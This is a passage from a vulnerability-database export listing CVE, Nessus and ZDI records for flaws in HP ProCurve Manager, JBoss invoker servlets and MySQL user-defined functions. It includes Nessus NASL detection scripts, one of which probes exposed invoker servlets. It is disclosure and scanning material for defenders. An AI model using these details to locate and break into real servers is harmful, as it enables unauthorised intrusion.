["cpe:/a:oracle:mysql:5.0.33"], "id": "CVE-2005-2572", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-2572", "cvss": {"score": 8.5, "vector": "AV:N/AC:M/Au:S/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:oracle:mysql:5.0.33:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T13:53:34", "description": "The Agent (aka AgentController) servlet in HP ProCurve Manager (PCM) 3.20 and 4.0, PCM+ 3.20 and 4.0, and Identity Driven Manager (IDM) 4.0 allows remote attackers to execute arbitrary commands via a HEAD request, aka ZDI-CAN-1745.", "cvss3": {}, "published": "2013-09-16T13:01:00", "type": "cve", "title": "CVE-2013-4813", "cwe": ["CWE-94"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-4813"], "modified": "2013-09-26T03:52:00", "cpe": ["cpe:/a:hp:procurve_manager:3.20", "cpe:/a:hp:identity_driven_manager:4.0", "cpe:/a:hp:procurve_manager:4.0"], "id": "CVE-2013-4813", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-4813", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:hp:procurve_manager:3.20:*:*:*:*:plus:*:*", "cpe:2.3:a:hp:procurve_manager:4.0:*:*:*:*:plus:*:*", "cpe:2.3:a:hp:identity_driven_manager:4.0:*:*:*:*:*:*:*", "cpe:2.3:a:hp:procurve_manager:4.0:*:*:*:*:*:*:*", "cpe:2.3:a:hp:procurve_manager:3.20:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T13:53:31", "description": "UpdateCertificatesServlet in the SNAC registration server in HP ProCurve Manager (PCM) 3.20 and 4.0, PCM+ 3.20 and 4.0, and Identity Driven Manager (IDM) 4.0 does not properly validate the fileName argument, which allows remote attackers to upload .jsp files and consequently execute arbitrary code via unspecified vectors, aka ZDI-CAN-1743.", "cvss3": {}, "published": "2013-09-16T13:01:00", "type": "cve", "title": "CVE-2013-4812", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-4812"], "modified": "2013-09-26T03:52:00", "cpe": ["cpe:/a:hp:procurve_manager:3.20", "cpe:/a:hp:identity_driven_manager:4.0", "cpe:/a:hp:procurve_manager:4.0"], "id": "CVE-2013-4812", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-4812", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:hp:procurve_manager:3.20:*:*:*:*:plus:*:*", "cpe:2.3:a:hp:procurve_manager:4.0:*:*:*:*:plus:*:*", "cpe:2.3:a:hp:identity_driven_manager:4.0:*:*:*:*:*:*:*", "cpe:2.3:a:hp:procurve_manager:4.0:*:*:*:*:*:*:*", "cpe:2.3:a:hp:procurve_manager:3.20:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T13:53:18", "description": "Multiple SQL injection vulnerabilities in GetEventsServlet in HP ProCurve Manager (PCM) 3.20 and 4.0, PCM+ 3.20 and 4.0, and Identity Driven Manager (IDM) 4.0 allow remote attackers to execute arbitrary SQL commands via the (1) sort or (2) dir parameter.", "cvss3": {}, "published": "2013-09-16T13:01:00", "type": "cve", "title": "CVE-2013-4809", "cwe": ["CWE-89"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-4809"], "modified": "2013-09-26T03:52:00", "cpe": ["cpe:/a:hp:procurve_manager:3.20", "cpe:/a:hp:identity_driven_manager:4.0", "cpe:/a:hp:procurve_manager:4.0"], "id": "CVE-2013-4809", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-4809", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:hp:procurve_manager:3.20:*:*:*:*:plus:*:*", "cpe:2.3:a:hp:procurve_manager:4.0:*:*:*:*:plus:*:*", "cpe:2.3:a:hp:identity_driven_manager:4.0:*:*:*:*:*:*:*", "cpe:2.3:a:hp:procurve_manager:4.0:*:*:*:*:*:*:*", "cpe:2.3:a:hp:procurve_manager:3.20:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T13:53:25", "description": "UpdateDomainControllerServlet in the SNAC registration server in HP ProCurve Manager (PCM) 3.20 and 4.0, PCM+ 3.20 and 4.0, and Identity Driven Manager (IDM) 4.0 does not properly validate the adCert argument, which allows remote attackers to upload .jsp files and consequently execute arbitrary code via unspecified vectors, aka ZDI-CAN-1743.", "cvss3": {}, "published": "2013-09-16T13:01:00", "type": "cve", "title": "CVE-2013-4811", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-4811"], "modified": "2013-09-26T03:52:00", "cpe": ["cpe:/a:hp:procurve_manager:3.20", "cpe:/a:hp:identity_driven_manager:4.0", "cpe:/a:hp:procurve_manager:4.0"], "id": "CVE-2013-4811", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-4811", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:hp:procurve_manager:3.20:*:*:*:*:plus:*:*", "cpe:2.3:a:hp:procurve_manager:4.0:*:*:*:*:plus:*:*", "cpe:2.3:a:hp:identity_driven_manager:4.0:*:*:*:*:*:*:*", "cpe:2.3:a:hp:procurve_manager:4.0:*:*:*:*:*:*:*", "cpe:2.3:a:hp:procurve_manager:3.20:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T13:53:22", "description": "HP ProCurve Manager (PCM) 3.20 and 4.0, PCM+ 3.20 and 4.0, Identity Driven Manager (IDM) 4.0, and Application Lifecycle Management allow remote attackers to execute arbitrary code via a marshalled object to (1) EJBInvokerServlet or (2) JMXInvokerServlet, aka ZDI-CAN-1760. NOTE: this is probably a duplicate of CVE-2007-1036, CVE-2010-0738, and/or CVE-2012-0874.", "cvss3": {}, "published": "2013-09-16T13:01:00", "type": "cve", "title": "CVE-2013-4810", "cwe": ["CWE-94"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2007-1036", "CVE-2010-0738", "CVE-2012-0874", "CVE-2013-4810"], "modified": "2017-10-05T01:29:00", "cpe": ["cpe:/a:hp:application_lifecycle_management:-", "cpe:/a:hp:identity_driven_manager:4.0", "cpe:/a:hp:procurve_manager:4.0", "cpe:/a:hp:procurve_manager:3.20"], "id": "CVE-2013-4810", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-4810", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:hp:procurve_manager:3.20:*:*:*:*:plus:*:*", "cpe:2.3:a:hp:procurve_manager:4.0:*:*:*:*:plus:*:*", "cpe:2.3:a:hp:identity_driven_manager:4.0:*:*:*:*:*:*:*", "cpe:2.3:a:hp:application_lifecycle_management:-:*:*:*:*:*:*:*", "cpe:2.3:a:hp:procurve_manager:4.0:*:*:*:*:*:*:*", "cpe:2.3:a:hp:procurve_manager:3.20:*:*:*:*:*:*:*"]}], "nessus": [{"lastseen": "2021-08-19T12:59:22", "description": "User-defined functions in MySQL can allow a database user to cause binary libraries on the host to be loaded. The insert privilege on the table 'mysql.func' is required for a user to create user-defined functions. When running on Windows and possibly other operating systems, MySQL is potentially affected by the following vulnerabilities:\n\n - If an invalid library is requested the Windows function 'LoadLibraryEx' will block processing until an error dialog box is acknowledged on the server.\n It is not likely that non-Windows systems are affected by this particular issue.\n\n - MySQL requires that user-defined libraries contain functions with names fitting the formats: 'XXX_deinit' or 'XXX_init'. However, other libraries are known to contain functions fitting these formats and, when called upon, can cause application crashes, memory corruption and stack pollution.", "cvss3": {"score": null, "vector": null}, "published": "2011-11-18T00:00:00", "type": "nessus", "title": "MySQL User-Defined Functions Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2005-2572"], "modified": "2018-11-15T00:00:00", "cpe": ["cpe:/a:mysql:mysql"], "id": "MYSQL_USER_DEFINED_FUNCTIONS_RESTRICTIONS.NASL", "href": "https://www.tenable.com/plugins/nessus/17698", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif(description)\n{\n script_id(17698);\n script_version(\"1.13\");\n script_cvs_date(\"Date: 2018/11/15 20:50:21\");\n\n script_cve_id(\"CVE-2005-2572\");\n script_bugtraq_id(62358);\n\n script_name(english:\"MySQL User-Defined Functions Multiple Vulnerabilities\");\n script_summary(english:\"Checks for MySQL.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote database server is potentially affected by multiple\nvulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"User-defined functions in MySQL can allow a database user to cause\nbinary libraries on the host to be loaded. The insert privilege on\nthe table 'mysql.func' is required for a user to create user-defined\nfunctions. When running on Windows and possibly other operating\nsystems, MySQL is potentially affected by the following\nvulnerabilities:\n\n - If an invalid library is requested the Windows\n function 'LoadLibraryEx' will block processing until\n an error dialog box is acknowledged on the server.\n It is not likely that non-Windows systems are affected\n by this particular issue.\n\n - MySQL requires that user-defined libraries contain\n functions with names fitting the formats: 'XXX_deinit'\n or 'XXX_init'. However, other libraries are known to \n contain functions fitting these formats and, when called\n upon, can cause application crashes, memory corruption\n and stack pollution.\");\n\n script_set_attribute(attribute:\"solution\", value:\n\"There is currently no known fix or patch to address these issues. \nInstead, make sure access to create user-defined functions is\nrestricted.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:S/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"see_also\", value:\"https://seclists.org/fulldisclosure/2005/Aug/199\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2005/08/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/11/18\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:mysql:mysql\");\n script_set_attribute(attribute:\"exploited_by_nessus\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(english:\"This script is Copyright (C) 2011-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Databases\");\n\n script_dependencies(\"mysql_version.nasl\", \"mysql_login.nasl\");\n script_require_ports(\"Services/mysql\", 3306);\n script_require_keys(\"Settings/PCI_DSS\");\n exit(0);\n}\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"mysql_func.inc\");\n\n# Only PCI considers this an issue.\nif (!get_kb_item(\"Settings/PCI_DSS\")) exit(0, \"PCI-DSS compliance checking is not enabled.\");\n\nport = get_service(svc:\"mysql\", default:3306, exit_on_fail:TRUE);\n\nif (mysql_init(port:port) >= 0)\n{\n # Try to get variant and version\n variant = mysql_get_variant();\n version = mysql_get_version();\n}\nelse exit(0, \"The service on port \"+port+\" does not look like MySQL.\");\n\n# All versions are vulnerable.\nif (report_verbosity > 0)\n{\n if (!isnull(variant) && !isnull(version))\n {\n report =\n '\\n Variant : ' + variant +\n '\\n Installed version : ' + version +\n '\\n';\n datadir = get_kb_item('mysql/' + port + '/datadir');\n if (!empty_or_null(datadir))\n {\n report += ' Data Dir : ' + datadir + '\\n';\n }\n databases = get_kb_item('mysql/' + port + '/databases');\n if (!empty_or_null(databases))\n { \n report += ' Databases :\\n' + databases;\n }\n }\n else\n {\n report = \n '\\nNessus was able to determine a MySQL server is listening on' +\n '\\nthe remote host but unable to determine its version and / or' +\n '\\nvariant.' +\n '\\n';\n }\n security_hole(port:port, extra:report);\n}\nelse security_hole(port);\nmysql_close();\n", "cvss": {"score": 8.5, "vector": "AV:N/AC:M/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T12:50:28", "description": "User-defined functions in MySQL can allow a database user to load binary libraries. The insert privilege on the table '/mysql.func' is required for a user to create user-defined functions. It was confirmed that MySQL on the Windows platform (and possibly other platforms, though unverified) is potentially impacted by the following vulnerabilities:\n\n - If an invalid library is requested the Windows function 'LoadLibraryEx' will block processing until an error dialog box is acknowledged on the server. It is not likely that non-Windows systems are affected by this particular issue.\n\n - MySQL requires that user-defined libraries contain functions with names fitting the formats: 'XXX_deinit' or 'XXX_init'. However, other libraries are known to contain functions fitting these formats and, when called upon, can cause application crashes, memory corruption and stack pollution.", "cvss3": {"score": 7.5, "vector": "CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2014-04-24T00:00:00", "type": "nessus", "title": "MySQL User Defined Function Detected", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2005-2572"], "modified": "2019-03-06T00:00:00", "cpe": ["cpe:2.3:a:oracle:mysql:*:*:*:*:*:*:*:*"], "id": "8218.PRM", "href": "https://www.tenable.com/plugins/nnm/8218", "sourceData": "Binary data 8218.prm", "cvss": {"score": 8.5, "vector": "CVSS2#AV:N/AC:M/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-06-16T14:16:23", "description": "The 'EBJInvokerServlet' and 'JMXInvokerServlet' servlets hosted on the web server on the remote host are accessible to unauthenticated users. The remote host is, therefore, affected by the following vulnerabilities :\n\n - A security bypass vulnerability exists due to improper restriction of access to the console and web management interfaces. An unauthenticated, remote attacker can exploit this, via direct requests, to bypass authentication and gain administrative access.\n (CVE-2007-1036)\n\n - A remote code execution vulnerability exists due to the JMXInvokerHAServlet and EJBInvokerHAServlet invoker servlets not properly restricting access to profiles. An unauthenticated, remote attacker can exploit this to bypass authentication and invoke MBean methods, resulting in the execution of arbitrary code.\n (CVE-2012-0874)\n\n - A remote code execution vulnerability exists in the EJBInvokerServlet and JMXInvokerServlet servlets due to the ability to post a marshalled object. An unauthenticated, remote attacker can exploit this, via a specially crafted request, to install arbitrary applications. Note that this issue is known to affect McAfee Web Reporter versions prior to or equal to version 5.2.1 as well as Symantec Workspace Streaming version 7.5.0.493 and possibly earlier.\n (CVE-2013-4810)", "cvss3": {"score": null, "vector": null}, "published": "2013-10-14T00:00:00", "type": "nessus", "title": "Apache Tomcat / JBoss EJBInvokerServlet / JMXInvokerServlet Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2007-1036", "CVE-2012-0874", "CVE-2013-4810"], "modified": "2022-03-28T00:00:00", "cpe": ["cpe:/a:hp:procurve_manager", "cpe:/a:hp:application_lifecycle_management", "cpe:/a:hp:identity_driven_manager", "cpe:/a:redhat:jboss_enterprise_web_platform", "cpe:/a:redhat:jboss_enterprise_application_platform", "cpe:/a:redhat:jboss_enterprise_brms_platform", "cpe:/a:redhat:jboss_enterprise_application_platform", "cpe:/a:jboss:jboss_application_server", "cpe:/a:symantec:workspace_streaming"], "id": "JMXINVOKERSERVLET_EJBINVOKERSERVLET_RCE.NASL", "href": "https://www.tenable.com/plugins/nessus/70414", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(70414);\n script_version(\"1.24\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/03/28\");\n\n script_cve_id(\"CVE-2007-1036\", \"CVE-2012-0874\", \"CVE-2013-4810\");\n script_bugtraq_id(57552, 62854, 77037);\n script_xref(name:\"CERT\", value:\"632656\");\n script_xref(name:\"EDB-ID\", value:\"16318\");\n script_xref(name:\"EDB-ID\", value:\"21080\");\n script_xref(name:\"EDB-ID\", value:\"28713\");\n script_xref(name:\"EDB-ID\", value:\"30211\");\n script_xref(name:\"ZDI\", value:\"ZDI-13-229\");\n script_xref(name:\"HP\", value:\"HPSBGN02952\");\n script_xref(name:\"HP\", value:\"SSRT101127\");\n script_xref(name:\"HP\", value:\"emr_na-c04041110\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/04/15\");\n\n script_name(english:\"Apache Tomcat / JBoss EJBInvokerServlet / JMXInvokerServlet Multiple Vulnerabilities\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The 'EBJInvokerServlet' and 'JMXInvokerServlet' servlets hosted on\nthe web server on the remote host are accessible to unauthenticated\nusers. The remote host is, therefore, affected by the following\nvulnerabilities :\n\n - A security bypass vulnerability exists due to improper\n restriction of access to the console and web management\n interfaces. An unauthenticated, remote attacker can\n exploit this, via direct requests, to bypass\n authentication and gain administrative access.\n (CVE-2007-1036)\n\n - A remote code execution vulnerability exists due to the\n JMXInvokerHAServlet and EJBInvokerHAServlet invoker\n servlets not properly restricting access to profiles. An\n unauthenticated, remote attacker can exploit this to\n bypass authentication and invoke MBean methods,\n resulting in the execution of arbitrary code.\n (CVE-2012-0874)\n\n - A remote code execution vulnerability exists in the\n EJBInvokerServlet and JMXInvokerServlet servlets due to\n the ability to post a marshalled object. An\n unauthenticated, remote attacker can exploit this, via a\n specially crafted request, to install arbitrary\n applications. Note that this issue is known to affect\n McAfee Web Reporter versions prior to or equal to\n version 5.2.1 as well as Symantec Workspace Streaming\n version 7.5.0.493 and possibly earlier.\n (CVE-2013-4810)\");\n # https://www.redteam-pentesting.de/publications/2009-11-30-Whitepaper_Whos-the-JBoss-now_RedTeam-Pentesting_EN.pdf\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?74979c27\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.zerodayinitiative.com/advisories/ZDI-13-229/\");\n # https://web.archive.org/web/20131031213751/http://retrogod.altervista.org/9sg_ejb.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?52567bc1\");\n script_set_attribute(attribute:\"see_also\", value:\"https://seclists.org/bugtraq/2013/Oct/126\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.securityfocus.com/archive/1/530241/30/0/threaded\");\n script_set_attribute(attribute:\"see_also\", value:\"https://seclists.org/bugtraq/2013/Dec/att-133/ESA-2013-094.txt\");\n script_set_attribute(attribute:\"solution\", value:\n\"If using EMC Data Protection Advisor, either upgrade to version 6.x or\napply the workaround for 5.x. \n\nOtherwise, contact the vendor or remove any affected JBoss servlets.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:U/RC:ND\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2013-4810\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_nessus\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'JBoss JMX Console Deployer Upload and Execute');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_exploithub\", value:\"true\");\n script_set_attribute(attribute:\"exploithub_sku\", value:\"EH-13-606\");\n script_cwe_id(264);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/09/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/10/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:hp:procurve_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:hp:application_lifecycle_management\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:hp:identity_driven_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:redhat:jboss_enterprise_web_platform\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:redhat:jboss_enterprise_application_platform\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:redhat:jboss_enterprise_brms_platform\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:redhat:jboss_enterprise_application_platform\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:jboss:jboss_application_server\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:symantec:workspace_streaming\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2013-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"http_version.nasl\");\n script_require_ports(\"Services/www\", 9111, 8080, 9832);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\n\n# Identify possible ports.\n#\n# - web servers.\nports = get_kb_list(\"Services/www\");\nif (isnull(ports)) ports = make_list();\n\n# - ports for McAfee Web Reporter and Symantec Workspace Streaming.\nforeach p (make_list(8080, 9111, 9832))\n{\n if (service_is_unknown(port:p)) ports = add_port_in_list(list:ports, port:p);\n}\n\n# Check each port.\nnon_vuln = make_list();\n\nforeach port (ports)\n{\n vuln_urls = make_list();\n\n foreach page (make_list(\"/EJBInvokerServlet\", \"/JMXInvokerServlet\"))\n {\n url = \"/invoker\" + page;\n res = http_send_recv3(\n method : \"GET\",\n item : url,\n port : port,\n fetch404 : TRUE\n );\n\n if (\n !isnull(res) &&\n \"org.jboss.invocation.MarshalledValue\" >< res[2] &&\n (\n 'WWW-Authenticate: Basic realm=\"JBoss HTTP Invoker\"' >!< res[1] ||\n \"404 Not Found\" >!< res[1]\n )\n ) vuln_urls = make_list(vuln_urls, build_url(qs:url, port:port));\n }\n\n if (max_index(vuln_urls) > 0)\n {\n if (max_index(vuln_urls) > 1) request = \"URLs\";\n else request = \"URL\";\n\n if (report_verbosity > 0)\n {\n report =\n '\\n' +'Nessus was able to verify the issue exists using the following '+\n '\\n' + request + ' :' +\n '\\n' +\n '\\n' + join(vuln_urls, sep:'\\n') + '\\n';\n\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n }\n else non_vuln = make_list(non_vuln, port);\n}\n\nif (max_index(non_vuln) == 1) exit(0, \"The web server tested on port \" + port + \" is not affected.\");\nelse if (max_index(non_vuln) > 1) exit(0, \"None of the ports tested (\" +join(non_vuln, sep:\", \")+ \") contain web servers that are affected.\");\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "zdi": [{"lastseen": "2022-01-31T21:01:24", "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of HP PCM Plus. Authentication is not required to exploit this vulnerability. The specific flaws exist within the Agent servlet. This servlet is vulnerable to a command injection vulnerability when processing HEAD requests. A remote attacker can leverage this vulnerability to execute remote code under the context of the SYSTEM user.", "cvss3": {}, "published": "2013-09-11T00:00:00", "type": "zdi", "title": "HP PCM+ AgentController Servlet Command Injection Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-4813"], "modified": "2013-09-11T00:00:00", "id": "ZDI-13-228", "href": "https://www.zerodayinitiative.com/advisories/ZDI-13-228/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-01-31T21:01:29", "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of HP PCM Plus. Authentication is not required to exploit this vulnerability. The specific flaw exists within the UpdateCertificatesServlet. This servlet improperly sanitizes the 'fileName' argument allowing the remote attacker could upload a .jsp file. This can result in remote code execution under the context of the SYSTEM user.", "cvss3": {}, "published": "2013-09-11T00:00:00", "type": "zdi", "title": "HP PCM+ SNAC Registration Server UpdateCertificatesServlet Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-4812"], "modified": "2013-09-11T00:00:00", "id": "ZDI-13-225", "href": "https://www.zerodayinitiative.com/advisories/ZDI-13-225/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-01-31T21:01:25", "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of HP PCM Plus. Authentication is not required to exploit this vulnerability. The specific flaw exists within the GetEventsServlet. This servlet contains a SQL injection vulnerability in the sort and dir arguments. This can result in remote code execution under the context of the SYSTEM user.", "cvss3": {}, "published": "2013-09-11T00:00:00", "type": "zdi", "title": "HP PCM+ GetEventsServlet SQL Injection Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-4809"], "modified": "2013-09-11T00:00:00", "id": "ZDI-13-227", "href": "https://www.zerodayinitiative.com/advisories/ZDI-13-227/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-01-31T21:01:26", "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of HP PCM Plus. Authentication is not required to exploit this vulnerability. The specific flaw exists within the UpdateDomainControllerServlet. This servlet improperly sanitizes the 'adCert' argument allowing the remote attacker could upload a .jsp file. This can result in remote code execution under the context of the SYSTEM user.", "cvss3": {}, "published": "2013-09-11T00:00:00", "type": "zdi", "title": "HP PCM+ SNAC Registration Server UpdateDomainControllerServlet Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", 